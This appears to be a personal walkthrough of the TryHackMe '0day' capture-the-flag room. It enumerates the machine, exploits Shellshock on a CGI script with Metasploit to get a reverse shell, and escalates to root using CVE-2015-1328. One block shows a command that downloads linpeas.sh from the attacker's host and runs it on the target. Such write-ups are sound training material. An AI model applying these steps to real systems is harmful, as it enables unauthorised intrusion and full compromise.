Tryhackme — 0day Walkthrough
Welcome to this writeup for the tryhackme room “0day”. I really enjoyed solving this puzzle!
We start as always with a nmap scan and look for anything interesting.
We have ssh on port 22 running (OpenSSH 6.6.1p1 Ubuntu) and an apache webserver on port 80. Using the Firefox extension “Wappalyzer” we can figure out what kind of technology is in play.
We can see that there are some JavaScript functions involved, for example the JavaScript graphics “particles.js” and some other stuff. After inspecting the source code with F12 or rightclick → “view Page Source”, we find something interesting.
After googling a bit we came across the so called “Subresource Integrity”, which can be a security risk, but is more of a rabbit hole. Before starting the directory bruteforce, I always check for /robots.txt and well..
He got me with that one, lol. I’m doing the directory bruteforce with gobuster, dirsearch and dirbuster, but I’ll just show the gobuster output because it won’t help at all. I’m using the directory bruteforce (dir) option with the flag -u for the URI, the -w for the wordlist and -t 100 for 100 threads. I want to speed that up a bit after discovering that he’s trolling me, lol.
We found an interesting directory “/cgi-bin”, keep that in mind for later. Well, I jumped to /admin and /secret first, obviously. The /admin page won’t be displayed, and /secret looks like he wants to troll me again.
I immadiately figured out that is going to be a rabbit hole. Well, we could try some steganography at this point, but I expected far more form 0day as that. Well, I can’t say that the psychological component isn’t important as well. This is the point where I got stuck and looked for any hints. Let’s see what the room itself has to say about it.
I tried a lot of things at this point like searching for “hacking history”, googling some hacker groups containing the “turtle” in name and a lot more. After figuring out that I don’t know anything about turtles, I taked a step back and tried a nikto scan. Don’t neglet that one, it could be painful for you. Nikto is basically a webapp scanner and can be used with the -h flag for “hosts”. Nikto found immadiately some useful informations! If nikto is going to say “I found something interesting”, yeah, than it IS really interesting.
We come back to “the history of hacking” with the discovery of the shellshock vulnerability at /cgi-bin/test.cgi. After a bit of Google search, we can figure out that there’s an Metasploit exploit for it. Let’s take it easy and do it with Metasploit. We search for the correct exploit within Metasploit.
We set the RHOST to the machine IP, LHOST to the attacker IP (which I misspelled in first place, so be careful to type “LHOST”), LPORT to some random value like 4444 and really important, the Targeturi to /cgi-bin/test.cgi. That’s how we can exploit the shellshock vulnerability, which is basically a family of security bugs in the Unix Bash shell. For more details about it read this one: What is Shellshock und why does it matter?
After running it with “run” (or “exploit” if you wanna feel like a hacker), we get a reverse connection. Trying Metasploit commands like “hashdump” didn’t worked, so I created a shell using the “shell” command.
I used the command (which can be found on https://gtfobins.github.io/ as well):
python -c ‘import pty;pty.spawn(“/bin/bash”)’
To spawn a more stable shell. Now it’s time to privilege escalation. Basically to get a root shell! Sometimes just typing “sudo -l” works, but not in this case. I looked at common places on Unix operating systems like /etc/crontab, /opt/, the home folder /home with /home/.secret and a lot more, but couldn’t find anything useful by myself.
With simply using
uname -a
you can figure out that this is a really old operating system. Or you do it the more complicated way with linpeas.sh like me. To transfer it, use in the directory where linpeas.sh is, the command
python -m SimpleHTTPServer 8000
on your attacker box and on the target box, download and execute it inside the /tmp folder by entering
cd /tmp
wget http://your-kali-ip:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
We get a yellow PE vector, which means it’s highly possibly that we can use that to escalate our privileges.
After googling it, we find some juicy exploits. We used Metasploit before so why not use it again? Exit your current session with Ctrl+C and use
meterpreter > background
to background your current session (you need to remember the session ID later, so write it down. If you haven’t messed up it’s probably ID 1). Now we set up the options, most of it is again the same. Just make sure to choose the correct target id, with typing:
show targets
set target 0
The CVE (target option) we gonna use is CVE-2015–1328. By default, it’ll be target 1. Please change that before continuing.
Now the fun part begins!
Now we got a root shell. Collect the flags and finish this!
This was really enjoyable and a funny room! Thanks to 0day for creating this one. If you have any questions about this walkthrough, feel free to contact me at discord; PenTestical#1892.